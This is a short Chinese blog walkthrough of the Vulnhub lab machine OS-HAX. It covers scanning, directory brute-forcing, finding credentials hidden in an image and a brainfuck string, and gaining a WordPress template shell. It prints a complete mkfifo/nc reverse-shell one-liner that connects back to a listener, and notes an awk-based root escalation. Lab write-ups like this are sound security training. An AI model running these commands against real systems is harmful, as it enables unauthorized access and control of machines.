【Vulnhub】靶机Os-Hax

前言

  • Vulnhub刷题简单记录

OS-HAX

描述

难度:中级

标志:引导根

学习:利用 | 网络应用安全| 权限提升

https://www.vulnhub.com/entry/hacknos-os-hax,389/

OS-HAX开始

1、可以用两种方法确认靶场的存在,扫ip

1
2
netdiscover -i eth0 -r 192.168.1.0/24
nmap -sn 192.168.1.0/24

2、扫目标端口开发情况

1
nmap -sV -sC -A 192.168.1.108

3、访问主页,根据提示说有一个password_resets,我们扫一下目录情况

1
2
3
gobuster dir -u http://192.168.1.104/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 200

dirb http://192.168.1.104/

4、通过String查看img中的flaghost的图片,获取一个密码的信息passw@45

5、也可以用exiftool 来查看图片信息

6、接着猜测他是目录,发现了brainfuck加密,接着去解密http://192.168.1.102/passw@45/flag2.txt

1
2
3
4
i+++++ +++++ [->++ +++++ +++<] >++++ +++++ +++++ +++++ .<+++ +[->- ---<]
>--.- --.<+ +++++ [->-- ----< ]>--- -.<++ +[->+ ++<]> +++++ .<+++ ++[->
+++++ <]>.+ +.+++ +++++ .---- --.<+ ++[-> +++<] >++++ .<+++ ++++[ ->---
----< ]>-.< +++[- >---< ]>--- .+.-- --.++ +.<

image-20210923101446982

7、利用获取的账号和密码登陆wordpress后台改模板拿shell

image-20210923101819727

image-20210923102028521

7、用下面命令反弹shell

1
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.104 1234 >/tmp/f

image-20210923105501616

8、提权看下面截图,就是利用web的权限,执行awk命令来获取root权限

image-20210923110221578

我的个人博客

孤桜懶契:http://gylq.gitee.io

本文标题:【Vulnhub】靶机Os-Hax

文章作者:孤桜懶契

发布时间:2021年09月23日 - 09:14:24

最后更新:2022年05月20日 - 11:47:45

原始链接:https://gylq.gitee.io/posts/146.html

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。

-------------------本文结束 感谢您的阅读-------------------